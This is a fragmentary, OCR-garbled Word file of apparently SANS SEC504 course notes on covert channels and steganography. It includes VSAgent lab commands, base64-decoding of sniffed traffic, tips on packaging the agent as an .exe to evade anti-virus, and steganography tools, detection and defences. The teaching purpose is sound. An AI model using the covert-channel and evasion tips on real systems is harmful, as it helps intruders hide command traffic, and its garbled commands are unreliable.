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F84" w:rsidRPr="00C80F84" w:rsidRDefault="00C80F84" w:rsidP="00C80F8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F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5) </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="00C80F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504.5 - Computer &amp; Network Hacker Exploits, Part 4 quick notes </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C80F84" w:rsidRPr="00C80F84" w:rsidRDefault="00C80F84" w:rsidP="00C80F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80F84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>504.5 - Computer &amp; Network Hacker Exploits, Part 4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1. App-Level Trojan Horse backdoor Suites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allow for the complete control of a victim system remotely across the network.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client-server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architecture.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popular and many examples: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Poison Ivy, VNC (realvnc.com),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Dameware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(commercial), Sub7, Lots of others such as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BlackShades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GhostRAT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attackers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can trick victim into running tool.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attackers can install it themselves.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payload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option in Metasploit.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Don't fall for Scareware that your system is compromised!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wrappers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and Packers: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wrap a backdoor tool around some other application.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create a Trojan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Horse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executable.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Also known as “Binders”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Example: Wrap nc.exe into an interactive birthday card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Built into many backdoors (i.e., Poison Ivy)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Metasploit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msfvenom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Can wrap into .VBS or NBA for macros in Word and Excel with exe2vba.rb and exe2vbs.rb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The Veil toolkit uses some of these techniques to bypass AV!!!!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SET’s default payload generation also does this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Windows anti-reverse engineering for Executables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For thwarting Windows reverse engineering of malicious code, attackers frequently use packers.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Originally focused merely on compression of executables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But, limits string searches and direct disassembly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Gives attacker more obscurity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Dozens of different packing algorithms and tools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UPX is the most popular, available at http://upx.sourceforge.net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Yoda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Themida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Exe32pack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Many more listed at http://enwikipedia.org/wiki/Executablecornpression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Commercial ones as well (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Thinstall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PECompact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PEBundle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, etc.)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t>Defense: Unpacking Windows Executables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To thwart these, researchers use unpackers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Or, use a plug-in for a debugger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Ollydbg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— Very popular free Windows debugger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Dozens of unpacking scripts run as plug-ins for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Ollydbg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at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www.openrce.org/downloads/browse/OllyDbg_OllyScripts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That whole site (openrce.org) contains amazingly helpful stuff for reverse engineering malware!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If a custom packing/obscuring algorithm is used, the researcher might need to create a custom unpacker using code from the malware specimen under analysis; this could take a lot of time.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Immunity Debugger - very popular free Windows debugger.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5.3 Memory Analysis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FOR MEMORY DUMPS!!!!!!!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Investigators can use several tools to analyze memory dumps from Windows machines to determine attackers’ actions, such as executing malicious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application-level Trojan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Horse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backdoors.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First, you’ll need a memory dump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Can be generated using a variety of utilities, including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Mandiant’s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Memoryze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MemoryDD.bat,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HBGary’s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fastdump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Matthieu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Suich's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win32dd,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winpmem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and ManTech’s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mdd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Volatile Systems’ Volatility framework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Free, open source, very feature rich and useful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A modular tool written in Python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https://code.google.com/p/volatility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Google’s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Free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* http://wwww.mandiant.com/products/free_software/memoryze/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We focus on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for analysis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FTK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Some important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modules include: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imageinfo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 Shows the date and time the memory dump was captured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 Lists open sockets (PID, Port, Protocol, and when it was opened)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pstree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 See a full process tree for a memory image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pslist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 Lists running processes (PID, name, and Parent PID)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dillist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 Lists the DLLs loaded by a process, as well as the command-line invocation of a process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—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 Shows all active listening UDP and TCP ports and connections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ifiescan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 Lists the files that each process had open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pedump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 Dumps code associated with running process into executable file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modules: Lists loaded modules from the dump, including drivers and SYS files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Numerous other modules as well, included with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, and available as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Numerous other modules are available for download and most of them are listed at the URL on the slide separate downloads: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http://www.rekall-forensic.com/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sec504@slingshot:~$source /home/tools/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/bin/activate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$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-f /home/tools/504_memory_ex/memimage.dd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 Viewing Network Connections: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using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Rekall's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' module, we can display a list of active network connections at the time the memory dump was acquired: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Using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Rekall’s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” module, we can display a list of active network connections at the time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memoiy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dump was acquired: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[1] memimaqe.dd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hh:mm:ss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Output is similar to the following command on a live Windows machine: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nao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| find “ESTABLISHED”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Viewing Processes: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Rekall’s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pslist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” module displays a list of running processes at the time the image was acquired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[1]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memimagedd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hh:mm:ss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pslist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Output is similar to the following command on a live Windows machine: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wmic process get name,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parentprocessid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processid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 DLLs and Command Line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Rekall’s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dilhist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” module to display a list of DLLs loaded by a process, as well as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commandline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invocation of a running process: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[1] memimage.dd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hh:mm:ss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dlllist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pid_num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Output is similar to the following commands on a live Windows machine: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:\&gt;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tasklist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/m /fi “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]”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wmic process where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processid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] get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commandline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t>c:\nc.exe -n 192.168.49.145 6000 -e c:\ncrelay.bat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For the list of DLLs loaded by every running process, we can use the following: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tasklist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/m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For the list of DLLs loaded by a specific process, we can execute the following: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tasklist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/m /fi “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]”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Lab: Windows Attack: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to analyze the image in /home/tools/504_memory_ex/memimage.dd, determine what the attacker was doing on the compromised system by answering the following questions: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1. Which processes are communicating with other machines on the network?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2. Which processes did the attacker likely run?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3. Is the attacker using the machine to pivot, and if so, how, and to which other systems is he/she pivoting?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4. Which suspicious process seems to be the root of all other suspicious activity on the compromised system?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5. Which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builtin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windows commands would you use if you were doing the same analysis on a live Windows system instead of a memory dump file?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:Hint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>: first Populate This Connection Table - Lab: Windows Attack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As a hint, you might find it useful to start by populating the Connection Table provided in the slide. When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this table is filled, you will have answered Question I and significantly started Question 2.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PID     PPID     Name         Remote IP         Remote Port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(for the table above)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use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Rekall's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' module.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or in Windows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c:\&gt;netstat -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nao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| find "Established"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get the parent process ID in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&gt;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pslist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or Windows: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c:\&gt;wmic process get name,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parentprocessid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processid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Another Hint: Then Populate this process table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PID     PPID         Name                 Command-Line Invocation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Start by copying over the information for processes you have on the Connection Table, and then use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to analyze processes and fill in the blanks, especially the PPID and Command-Line Invocation fields. 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You should also look for other, related processes the attacker might have invoked.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Pay special attention to process relationships indicated by the Parent Process ID (PPID).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Identify Processes by Connection (I):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Determine which processes are communicating on the network using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” module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Use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pslist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" module to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cross ..reference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the PIDs associated with established network connections with the list of running processes to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determine the name of each process associated with each connection.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Also record the Parent PID of each process, because you’ll need it soon (PPID is the fourth column of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process output)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Also run the below in Windows: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C:\&gt; wmic process get name ,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parentprocessid,processid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Determine Command-Line Invocations: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Next, we have to dive deeper and determine each process’s command-line invocation using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RekaWs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dlllhist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” module, paying particular attention to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Netcat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instances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For each process in our table, run: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[1] memimage.dd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hh:mm:ss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dlllist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pid_num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&gt;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dlllist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=1744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For Question 5, the rough equivalent of this command on a live Windows machine is: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wmic process where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processid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] get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commandline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tasklist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/m /fi “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]”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On a live Windows machine, the commands you’d use to pull this same kind of information are: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wmic process where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processid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=1896 get name,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parentprocessid,processid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Or, if you want to more closely mimic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Rekall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command used with Linux grep, you could run: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wmic process get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name,parentprocessid,processid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| find “2124”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And, to get the command-line invocation information, you could run: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wmic process where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processid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=2124 get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commandline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t>cmd.exe /c for /L %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in (1,1,255) do @ping -n 1 192.168.49.%i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(1,1,255) means Start with 1, step 1, up to 255.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Process Map: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2516 (explorer.exe)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|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v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3600 (hot_pics.exe)--------------&gt; 1428(metsvc.exe) -----&gt; 496(services.exe)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|          |    |                        |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v          |    v                        v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1744(nc.exe)  |    408(nc.exe)                    1428(metsvc.exe)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          v                            |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         2132(cmd.exe)                    v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                                3772(metsvc-server.exe)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#######################################################################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R00tKit techniques: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Rootkits are a collection of tools that allow an attacker to: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Keep backdoor access into a system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Mask the fact that the system is compromised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These goals are accomplished by altering the operating system itself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With these capabilities, rootkits are classic examples of Trojan Horse software and very effective backdoors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Components of rootkits have been discovered for other systems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Several UNIX/Linux rootkits at www.packetstormsecurity.org/UNIX/penetrafion/rootkits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Solaris, B$D, AIX, HP-UX, IRIX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Numerous Windows rootkits used by cyber criminals are also available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Mobile rootkits are just now getting traction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Rootkits are increasingly being bundled with spyware and bots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Windows User-Mode Rootkit DLL Injection and API Hooking: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EXEs and DLLs are commonly used methods for packaging code in Windows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EXEs run, and utilize shared DLLS to get stuff done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On Windows, anyone with the Debug right can inject a DLL into a running process ...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... and start it running by creating a thread in the target process.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Hook APIs to change programs’ views of running processes, open ports, and the file system.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t>Preparation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let attacker get root in the first place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Harden and patch the system thoroughly.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Identification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Detection can be quite difficult, but some methods are available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ls versus “echo *“. Output should include the same files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Nice, but not terribly practical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There are other ways we can catch the system telling a lie, which we cover after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kernelmode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rootkit discussion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Most rootkits do not store the password as a string, so “strings” on /bin/login will not work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Analysis of /bin/login by automated tool to look for embedded password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Containment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Analyze other systems’ changes made by discovered rootkits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Eradication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Wipe drive, and then reformat drive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Reinstall operating system, applications, and data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Make sure you apply all patches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You should change all admin/root passwords on victim and related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systems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Recovery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Monitor system very carefully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Kernel-Mode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Rookits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Kernel-mode rootkits are a big area of focus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By operating in the kernel,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allacker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has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complete control of the target machine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Hidden processes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Hidden files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Hidden network use (sniffing and port listeners)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Execution redirection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In general, there are (currently) five different methods for manipulating the kernel being publicly discussed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1. Loadable kernel modules (UNIX) and device drivers (Windows) --&gt; (the most popular method today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2. Altering kernel in memory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3. Changing kernel file on hard drive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4. Virtualizing the system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Each available on Linux and Windows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Method 3) Changing Kernel File on Hard Drive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Instead of altering live kernel in memory, attackers could overwrite kernel file on the hard drive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On Linux, the file is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vmlinuz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Whitepaper on this technique at http://www.phrack.org/issues.html?issue=6o&amp;id=8#article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On Windows, kernel functionality is in ntoskrnl.exe and win32k.sys files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Attacker must foil NTLDR integrity checks of these files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Disable them or...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Make them lie (alter their code)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Bolzano and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FunLove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viruses did this in 1999, but nothing much since then.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Virtualizing the System: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Dino A. Dai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Zovi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is working on a similar hardware-based rootkit called Vitriol for Intel VT-x technology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http://www.theta44.org/software/HVM_Rootkits_ddz_bh-usa-o6.pdf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Rootkit Examples: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Rooty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By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TurboBorland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Of Chaotic Security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Works on 2.6+ and 3.0+ Linux kernels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32- and 64-bit support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Uses driver support/loadable kernel modules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Like many rootkits, it uses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insmod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to insert the various rootkit components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Hides by modifying the results listed by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lsmod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Modifies the System Call Table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Real-time hiding from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strace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very scary.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Avatar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ROotkit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Uses driver infection technique twice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Once to bypass Host Based Intrusion Detection (HIDS)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The second is for persistence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Uses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bootkit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method of infection and persistence to bypass driver signing requirements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An interesting mixture of user-mode and kernel-mode techniques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Attempts to detect whether the target system is a VM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If not installed as Admin, it will automatically attempt local privilege escalation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Infects a random driver from a list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Does not infect the same driver for every system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It is able to infect system drivers without altering their size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Custom encryption used for Command and Control (C2)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You can find it here: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http://www.welivesecurity.com/2013/05/01/mysterious-avatar-rootkit-with-api-sdk-and-yahoo-groups-for-cccommunication/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Alureon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/TDL Rootkit Family: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Alureon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is one of the most powerful rootkits in widespread use for Windows today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Used to hide spyware, bots, and other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maiware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Original version called “TDSS”.,, then TDL1 followed by TDL2... and now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Alureon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— an iterative loop growing more powerful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Kernel-mode rootkit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Configuration file and some DLLS present in user mode, but hidden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Focus is on file hiding and dodging antivirus and rootkit detection tools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For installation,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Alureon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alters Windows device drivers associated with the file system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atapi.sys or iastor.sys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Alters driver, but changes system so that driver signature check always passes.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FOntanini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Rootkit (By Matias Fontanini).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Kernel-Mode Rootkit Defenses - Configuration Lockdown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All of these attacks require the bad guy to have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superuser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privileges (root or Administrator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Harden the box by hand, or.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Use a good security template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 Center for Internet Security (CIS), in conjunction with NSA, NIST, and others, has developed a set of templates for Win, Lin, Solaris, HP-UX, Cisco Routers, and Oracle DBs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http://www.cisecurity.org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They have scoring tools as well.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Defenses —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LinwdUNIX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Rootkit Detection Tools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Try to catch inconsistencies introduced by a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roothit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on a system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Chkrootldt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, free from www.chkrootkit.org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Checks for over 50 different rootkits, both user mode and kernel mode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Runs on Linux. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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freeBSD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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OpenBSD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NetBSD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, Solaris, HP-UX, True64, and BSDI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Numerous tests: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Look for alterations in binaries and check promiscuous mode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Check link count — each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directorvs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link count should equal two plus the number of directories contained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inside — some rootkits mess this up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Rootkit Hunter, free at http ://www.rootkit.nl/projects/rootkit_hunter.html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t>— Looks for 55 rootkits, both user mode and kernel mode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Runs on Linux, FreeBSD,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OpenBSD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, AIX, and Solaris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Also several tests, including rnd5 hashes of known evil binaries, comparison of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process list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vs. /proc, and default rootkit files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OSSEC includes ‘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tRootcheck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” with similar features at www,ossec.net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FALSE POSITIVES POSSIBLE!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Additional Windows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RootKit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Detectors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other tools use similar techniques to the rootkit Revealer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Sophos Anti-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RootKit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http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html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McAfee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RootKit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Detective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http://www.mcafee.com/us/downloads/free-tools/stinger.aspx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RootKit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REvealer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by Mark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Russinovich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http://www.microsoft.com/technet/sysinternals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always nice to have a second (and third) opinion!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Defenses: File Integrity Checking Tools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Look for changes to critical system files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File integrity checking tools help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Although a well-designed kernel-mode rootkit can trick the file integrity checker using execution redirection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Still, if the attacker makes any unmasked changes, you’ll spot him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Tripwire is a classic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Also looks for registry modifications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OSSEC is also very good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Runs on Linux, UNIX, Mac OS X, and Windows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Freely available at www.ossec.net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Other tools include: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Ionx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Data Sentinel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Network Intelligence/Forensics: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A lot of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rnalware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tries hard to hide on the end system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Morphing and kernel hacking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... but its use and propagation have definite patterns that can be observed on the network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Strange communication pairs (scans, client - &gt;client, server-&gt; server, server -&gt;client?)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Security Onion is an outstanding Network Forensic Distro Network-level intelligence and forensics can help detect such behavior early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Get the Security Onion now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https://code.google.com/p/security-onion/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t>Nifty auto-detection and throttling via network-based IPS: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NetWitness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fireEye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Sourcefire,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TippingPoint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ForeScout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, etc.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Kernel-Mode Rootkit Defenses: Contain,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Erad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Recov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 containment, eradication, and recovery steps for kernel-mode rootkits involve the same techniques used for user-mode rootkits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Containment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Analyze other systems’ changes made by discovered rootkits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Eradication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Wipe drive, and then reformat drive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Reinstall operating system, applications, and data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Make sure you apply all patches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You should change all admin/root passwords on victim and related systems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Recovery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Monitor system very carefully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RITA - finding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bads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things on your network using Free and Open Source tools!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BlackHillsInfoSec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company).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####################################################################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5.5 Covering Tracks in Linux and Unix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Hiding Files in UNIX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 easiest (and very effective) way to hide files is to simply name them something like ”.“ or ”..”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Note: There is a space after those dots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Or, just name a file “...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“ or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even ” “(that’s a space!)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For example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# ls -a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. ..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test.txt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# echo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hideme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&gt; “.."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#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—a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. .. ..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test.txt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Of course, you can do nastier stuff using rootkits.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Where Attackers Put Hidden UNIX files and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Dirs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In addition to using dot names, attackers want to put files in a place where they won’t be noticed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Popular locations for hidden stuff include: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/dev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t>—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Other complex components of the file system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/local/man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Numerous others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Log Editing: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Editing UNIX log files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Main log files can be found by viewing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syslog.conf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Attacker might check this to find out where the logs are located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Or just run a script that guesses where the logs are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Of particular interest in Linux are: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/log/secure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/log/messages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Logs of particular service that were exploited to gain access, such as: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/1og/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httpd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errorjog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/log/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httpd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aceessJog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These log files (usually in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/log) are written in ASCII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They are often edited by hand using a text editor or script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If the log file is very large, they usually use a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perl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script to edit it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Ex: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# find .  -name \*.log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#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find . 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-name \*.log -ls | sort -r -n -k7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# grep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this_word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this_file.txt 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Don't forget Shell History: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Attackers also delete or edit their shell history files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A list of the most recent N commands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500 by default in bash, although 1000 on some Linux distros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~/.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bash_history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, for example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Written in ASCII, and can be edited by hand with the permissions of the user or root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Attackers remove suspicious commands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Some even add commands to implicate some other user in the attack (divert attention)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The default history file size is 500 commands in bash, although some Linux distros increase this to 1000 (including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RedHat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Editing Shell History - A Problem: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Shell history is written when the shell is exited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When editing shell history, the command used to invoke the editor will be placed in the shell history file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The attacker could edit the file, exit the shell, start another shell, edit the history file again to remove it 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...but it will be added again!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A chicken and the egg problem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Solutions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1)Kill the shell, so that it cannot write the most recent shell history, including the command used to edit it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# kill -9 [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] ...or...   #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killall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-9 bash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2) Change the environment variable HISTSIZE (for bash) to zero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# unset HISTFILE then kill -9 $$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Account Entries in UNIX editing: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utmp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 file contains info about currently logged in users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Default location on Linux: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/run/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utmp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wtmp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 File contains data about past user logins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Default location on Linux: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/log/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wtmp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btmp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 File contains bad login entries for failed login attempts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Default location on Linux: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/log/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btmp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, but often not used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lastlog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 File shows login name, port, and last login time for each user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Default location on Linux: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/log/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lastlog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utmp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wtmp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btmp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are not stored in ASCII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They are stored as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utmp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structures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lastlog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stored in different manners on various systems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They can be edited only using specialized tools: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remove.c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, by Simple Nomad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Removes entries from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utmp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wtmp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lastlog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Numerous others, including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wtmped.c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marry.c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cloak.c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logwedit.c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wzap.c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, etc.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All available at www.packetstormsecurity.org/UNIX/penetration/log-wipers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Lab: Shell History Analysis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Analyzing a Shell History File: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On the course U$B, there is a .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bash_history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file located in the Linux directory from the root account of a compromised system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It’s also located inside the Linux VMware image, at /home/tools/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history_exercise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/.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bash_history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In this lab, we will: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Open this history file in an editor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Analyze its contents to determine the attacker’s actions on the machine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If you have trouble interpreting the attacker’s tactics, feel free to replicate them on your own Linux VMware system to get a better feel for the attacker’s actions.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Initial Action on the System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Open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histoiy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$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gedit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/home/tools/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history_exercise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/.bash history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When the attacker first gets access to the root account, he runs the following commands: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whoami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id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unname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-a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-a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What is the purpose of each command?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Some possible answers follow this section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Try to answer each question first, and review your answers at the end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File System Interactions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Next, the attacker executes the following commands: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cd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wget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1O.1O.1O.18/kit.tgz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tar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xfvz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kit.tgz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my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What is the purpose of each command?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Launching Processes (I):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Now,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allacker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gets more serious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echo “while :; do echo “Started”;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—l —p 8080 —e /bin/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; done” &gt;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init.conf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nohup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init.conf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nohup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./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init.conf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555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init.conf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nohup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./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init.conf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lsof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-Pi | grep 8080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What is the purpose of each command?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Launching Processes (2):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finally, the attacker accesses some important files and another system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cat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&gt; /dev/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/10.10.10.18/443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cat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/shadow &gt; /dev/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/1O.1O.1O.18/443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./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tcpdump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-n -s0 -w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init.out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port 80 &amp;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vi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/log/messages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tom@1O.11.12.15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exit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What is the purpose of each command?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REMEMBER: turn on time stamping in Linux and MAC for when you check the logs!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Lab: Shell History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Some Additional Questions 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the attacker a human or a script?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What specific files should the investigator look for?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What other systems has the attacker likely compromised?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Potential Answers (1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whoami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Checking to see which account the attacker has gained control of on the machine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Id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Verifying the privileges of the current account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unname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—a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Trying to check the kernel version of the system, but with a typo in the command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—a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Re-running the command, but without the typo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checking to see whether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Netcat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is installed.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Potential Answers (2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Making a directory that will blend in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cd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Moving into that directory as a base of operations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wget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1O.1O.1O.18/kit.tgz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Puffing down a package from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io.io.io.i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$, likely another compromised machine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tar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xfvz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kit.tgz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Opening the contents of the kit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mv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The kit must have included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Netcat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, which the attacker renames “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” to camouflage it.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Potential Answers (3)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echo “while :; do echo Started;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—l —p 8080 -e /bin/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; done" &gt;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init.conf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Putting an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autostart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loop together for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netcat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listener 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nohup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init.conf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Attempting to run the loop with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nohup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to survive logoff ... forgot to specify the path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nohup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./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init.conf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Now, attacker specifies path, but script isn’t executable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555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init.conf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changing permissions to read-execute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nohup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./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init.conf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finally running backdoor while loop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t>lsof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-Pi | grep 8080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verifying backdoor listener on TCP port 8080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Potential Answers (4)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cat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&gt; /dev/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/1O.1O.1O.18/443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cat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/shadow &gt; /dev/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/1O.1O.1O.18/443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Exfiltrating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and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/shadow using /dev/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./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tcpdump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-n -s0 -w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init.out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port 80 &amp;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Running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tcpdump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to grab traffic to and from port 80 into file called “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init.out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,” with a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snaplength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of zero to ensure full packet contents are stored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vi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/log/messages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Editing the logs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Where do we have current TCP connections?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tom@10.11.12.15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Connecting to 10.11.12.15 via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exit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Ending the session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Some Additional Answers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Was the attacker a human or a script?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Likely a human, due to the typos and corrections entered in real-time.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What specific files should the investigator look for?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kit.tgz,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init.conf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init.out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other systems has the attacker likely compromised?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10.10.10.18 — hosting the kit.tgz file, and the place where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and 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/shadow were sent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Possibly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10.11.12.15, as tom account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5.6 Covering Tracks in Windows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Hiding Files in NTFS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If system is running NTFS, alternate data streams are supported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Multiple streams can be attached to each file or directory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Attacker’s files can be hidden in a stream behind normal files on the system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Such as notepad.exe or word.exe (or anything else!)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Use the type command built into Windows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C: \&gt; type hackstuff.exe &gt; notepad.exe:stream1.exe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Or, use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program from the NT Resource Kit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C: \&gt;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hackstuff.exe notepad.exe:stream1.exe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• To get data back, it can be copied out of the stream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C: \&gt;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notepad.exe:stream1.exe hackstuff.exe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Alternatively, you can create an alternate data stream attached to a directory by simply typing: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C: \&gt; notepad &lt;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file_or_directory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name&gt;:&lt;stream name&gt;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If you know a stream exists and you know its name, you can view its contents using the more command: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C:\&gt; more &lt; c:\file:stream1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Alternate Data Streams in NTFS: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 hidden file in the stream will follow the other file around through normal copying between NTFS partitions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On Linux machines that have connected to a Windows box with NTFS,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smbclient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can get data from ADSs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But, Windows machines prior to Vista and 2008 Server offer no built-in capability for finding or deleting a stream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To delete a stream, you could move the file to FAT partition, and then move it back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On Vista, Win2008, and Windows 7,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command offers the /r option for listing ADSs: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/r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Will not show ADS behind Windows reserved filenames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COM1, COM2, LPT1, AUX, etc.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Finding Hidden Streams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Use antivirus tool to find malicious code in streams (nearly all have it)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Many anti-spyware tools lack ADS detection functionality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Third-party tools for finding alternate data streams in NTFS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LADS by frank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Hevne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, at www.heysoft.de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Streams at http://www.microsoft.com/technet/sysinternals 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Includes an option for deleting a stream — very useful feature!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Lab: Alternate Data Streams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Boot your Windows machine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Make a directory named c:\tmp (if it already exists,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thaf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S fine!)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C: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\&gt;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c:\tmp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Now, make a file in the directory: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C:\&gt; notepad c:\tmp\test.txt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Save some text in there, such as “hello!”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Let’s create an alternate data stream associated with the directory c:\tmp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C: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>\&gt; notepad c:\tmp\test.txt:hideme.txt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• Enter text (such as “This is hidden!”), save it, and close the file.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Looking for Alternate Data Streams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Let’s look for the alternate data stream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c:\tmp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Do you see it?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Bring up Windows file Explorer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Start -&gt; Run... type explorer.exe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Then, look at c:\tmp and c:\tmp\test.txt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Do you see hideme.txt?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Now, bring up the file again... you must type the full path!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C: \&gt; notepad C:\tmp\test.txt:hideme.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txt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It’s still there!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Executable in Alternate Data Streams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Let’s move a copy of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Netcat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into an alternate data stream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C:\&gt; type c:\tools\nc.exe &gt; c:\tmp\test.txt:nc.exe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You must type in the full path, starting at c:\!!!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You can look for this file, as we did previously...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Let’s run this copy of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Netcat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If you have Windows Vista, 7, or 2008 Server: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C:\&gt; wmic process call create c:\tmp\test.txt:nc.exe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If you have Windows XP or 2003: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C:\&gt; start c:\tmp\test.txt:nc.exe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You must do this at the command prompt! Not at the Start - Run...Taskbar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Now, type a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Netcat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command line, and you are rolling!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Bring up the Task Manager (CTRL—ALT-DEL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What does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Netcat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listener look like in the Process tab?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Using LADS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Now, let’s look for the alternate data stream using LADS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Install LADS from the course USB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Put it in the c:\tools\lads directory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Now, let’s look for some ADSs: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C:\&gt; c:\tools\lads\lads /S c:\tmp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If you are on Windows Vista, 7, or 200$ Server, try running “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/r /s c:\tmp”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Do you see the hidden stuff?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Let's Clean UP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We should remove all of the alternate data streams we created.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To do this, delete the c:\tmp directory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C:\&gt; del c:\tmp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rmdir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c:\tmp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Or, just drag the directory to the recycle bin to dispose of it.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Log Editing in Windows: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In Windows, by default, event logs are stored in C: \Windows\$ystem32\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winevt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\Logs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 main event log files are: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AppEvent.Evtx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— Application-oriented events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SecEvent.Evtx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— Security events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SysEvent.Evtx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— System events (readable by all users)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Like UNIX’s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wtmp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utmp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, these files are stored with a bunch of binary information and are not directly editable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In fact, the files are write-locked on a running Windows system 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An attacker with Admin privileges can clear the log files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Use the Event Viewer, or simply delete the file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An all-or-nothing proposition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An attacker can generate so many bogus, benign logs that circular log files wrap, overwriting the important events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Not overly practical, and likely to be noticed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Editing Logs with Physical Access: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With physical access, an attacker could boot to Linux and edit the Windows logs directly with a specialized tool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A Linux boot disk for editing the Windows password database (SAM) can be found at hllp://pogostick.net/~pnh/ntpasswd/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Be careful when using this on a machine with the Encrypting file System (EFS) on Windows XP and 2003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You will likely lose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EfS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keys if you change the password on them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This program cannot be used to edit logs.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...However it illustrates that similar techniques could be used against the event logs.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Meterpreter Log File Alterations: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 Metasploit Meterpreter also includes a log wiping utility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“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clearev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” command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Clears all events from the Application, System, and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Security logs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No option to specify a particular type of log or event to wipe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Currently, it clears the event logs completely, but could be expanded in the future to line-by-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t>line event log editing.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Defenses from Covering Tracks on Systems (I):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Preparation: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Use a separate server for logging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In UNIX, syslog to a separate server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Windows also supports syslog, through the use of third-party tools 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Evt2sys at http://code.google.com/p/eventlog-to-syslog/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&gt;&gt; Free, small,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liglthveight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tool that runs on Windows, reads event logs, and forwards them to syslog server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&gt;&gt; Win2K, Win2003, Win 7, and Win2008 and more supported 32-bit and 64-hit versions available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SL4NT at http://www.netal.com/sl4nt.htm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&gt;&gt; Freefor6o days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Kiwi’s syslog at http://www.kiwisyslog.com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&gt;&gt; Free as a running application, commercial if run as a service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Snare Agent and Log Server at http://www.intersectalliance.com/projects/SnareWindows/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&gt;&gt; Windows of all kinds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&gt;&gt; Commercial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User Behavioral Analytics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Microsoft Advance Threat Analytics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Rapid7 User Behavioral Analytics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Exabeam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Defenses from Covering Tracks on Systems (2):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Preparation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Cryptographic integrity checks of log files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Msyslog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from Core Labs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(http://oss.coresecurity.com/projects/msyslog.html) includes remote syslog and integrity-checking capabilities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Identification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Lookfor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gaps in logs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Look for corrupt logs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Cont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Erad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Recov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 N/A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5.7 Covering Tracks on the Network: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Tunneling and Covert Channels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You can carry any protocol on top of any other protocol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First protocol is encapsulated inside packets for second protocol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t>— Network sees only second protocol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Example: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X Windows over SSH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IP inside IP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IP over CP (the Avian Transport Protocol!)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RFCs 1149 and 2549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Reverse HTTP Shells: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Will work through web proxies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Uses HTP GET command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Even supports authenticating through a web proxy with static password!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ICMP Tunnels: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Covering the Tracks on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NetworlclCMPTunnels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Numerous tools early data inside the payloads of ICMP packets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(TCP over ICMP Echo and Reply), Loki (Linux shell),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ICMPSheU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(Linux),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PingChat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(Windows chat program),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ICMPCmd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(Windows cmd.exe access), and more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Let’s focus on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Written by Daniel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Stodle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, available at http://www.cs.uitno/—’daniels/PingTunnel/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Runs on Linux or Windows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Carries TCP connections inside ICMP Echo and ICMP Echo Reply packets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Author talks about using it “for those times when everything else is blocked”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Features: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Attacker configures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client to listen on a TCP port, from which it grabs data and forwards to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Proxy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Attacker also configures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client with an ultimate destination IP address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Client program on attacker’s machine makes a TCP connection to the chosen port on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locaihost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client sends packets to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Pthnnel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proxy in ICMP payloads, and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proxy dc-encapsulates TCP and forwards connection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MD5-based challenge/response authentication between client and proxy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Currently, no encryption between client and proxy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consists of two components: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client and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proxy.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1) Ping request with TCP packet in payload.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2)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Rng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reply with TCP response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3)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Client received the response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4) TCP Connection to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Proxy Established over any TCP ports on the Internet.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consists of two components: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client and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proxy. The attacker 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configures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client to listen on a given TCP port on the localhost interface of the client machine. In addition, the attacker must configure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proxy, which runs on an external machine, accessible via ping packets from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client. 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Finally, the attacker configures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client with a given ultimate destination address. That destination machine can provide any TCP-based service, including HTTP or Secure Shell. Note that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client software is configured with this destination address, which it tells to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proxy for each packet that it sends.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The attacker then runs some TCP-based client program on the attacker’s machine, directing it to connect to the localhost interface on the TCP port where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client is listening.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client takes the TCP packets, encapsulates them in ICMP Echo packets, and forwards the resulting packets to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proxy.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From a network perspective, only ping packets (with the TCP packet as the payload) are being sent.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proxy then de-encapsulates the TCP packet and forwards it to its ultimate destination simply using TCP. Likewise,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proxy encapsulates any responses that come back from that destination into ICMP Echo Reply packets, forwarding them back to the client.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proxy can be configured to authenticate the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client, using an MD5-based challenge/response authentication algorithm. Currently,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Ptunnel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does not support encryption. However, if the application using the TCP-based connection encrypts the data (such as HTTPS or SSH), the attacker would have some degree of protection of the data.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Covert Channels in TCP and IP Headers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why not just create a covert channel using extra space in the TCP or IP header?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Covert_TCP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is one tool that implements a covert channel using either the TCP or IP header.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Extending the Ideas of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Covert_TCP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Transfer Trojan Horse backdoor commands or shell instead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ofjust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Bi-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direcfional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bounce attack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Use other fields in the TCP, IP, and ICMP headers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Reserved space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IP options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ICMP message type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Other Covert Channels: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Just about any protocol can be used as a covert channel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•DNS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DNSCat2 by Ron Bowes and numerous other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maiware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specimens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Quick UDP Internet Connection (QUICK)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Use of multiplexed UDP connections for connections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Stream Control Transmission Protocol (SCTP)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Also uses multi-streaming to send data across multiple concurrent connections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Supports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multihoming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so multiple endpoints can be used as failover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Yeah, this means it has built-in C2 server failover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 goal of attackers using odd protocols for transfer is to find new areas where existing signatures do not exist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t>• Also, there are some issues with reassembly across multiple concurrent streams of data being sent.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Gcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Full C2 backdoor where all Command and Control traffic flows over Gmail.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Originally created by Ben Donnelly of BHIS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Currently maintained by byt3bl33d3r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Supports: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Command execution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Screenshots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Download and upload of files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Keylogging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Execution of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sheilcode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Bypasses many DLP/ID$/IPS systems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Many IDS/IPS/Firewalls are not monitoring Gmail traffic very well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https://github.com/byt3bl33d3r/gcat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Covert Channel Defenses (I):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Preparation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Keep attackers off system in the first place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Identification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Know what processes should be running on your systems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When a strange process starts running, investigate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Especially if it has admin/root privileges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Network-based IDS can analyze packets for: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Shell commands in HTTP (for reverse www shell)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Unusual data in ICMP messages (for ICMP tunnels)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false positives associated with network management equipment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Unusual changes in IP ID and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Ack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fields (for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Covert_TCP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) — pretty hard to do.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Lab: Covert Channels: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Plain Sight Covert Channels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Not all backdoors use plaintext to transmit data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Many use other protocols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HTfP8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IPSEC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DNS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Others hide in plain sight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For example, HTTP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Every custom web application has data and fields that are encoded and transmitted differently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For example, session parameters, hidden form elements, etc.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It is almost impossible for full inspection of all these different variables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t>• Let’s take a look at a backdoor that uses this technique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It also beacons at 30-second intervals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a very common technique for modern malware.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VSAgent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(I):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Custom backdoor written by the Black Hills Information Security team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Special 504 version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wntten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by Luke Baggett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Encodes all Command and Control (C2) in base64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Then,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inserls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it into a WEW$TATE parameter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 encoded data is sent in the 